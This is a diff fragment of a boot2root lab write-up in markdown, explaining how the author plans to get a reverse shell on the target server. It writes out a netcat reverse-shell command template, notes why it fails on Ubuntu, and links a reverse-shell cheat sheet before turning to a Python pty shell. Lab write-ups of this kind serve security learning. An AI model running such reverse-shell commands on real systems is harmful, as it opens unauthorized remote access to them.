nirae/boot2root/writeup1.md

 Now we can try to inject a reverse shell for a prettier access to the server.
 The classic way use netcat with a command like `nc <address> <port> -e /bin/sh`.
 But in this server (ubuntu), the version of netcat doesn't support the `-e` option, so it will not work

 There is many options to get a reverse shell (create a socket, open port, link a shell to the socket...).
-There is a lot of exemples here  : asafety.fr/reverse-shell-one-liner-cheat-sheet
+There is a lot of exemples [here](https://www.asafety.fr/reverse-shell-one-liner-cheat-sheet/)

 We will do a python version because there is already python on the server.
 We use `pty` to spawn a shell because we need a tty shell (for `su` etc), better then just simple `bash` process like the exemples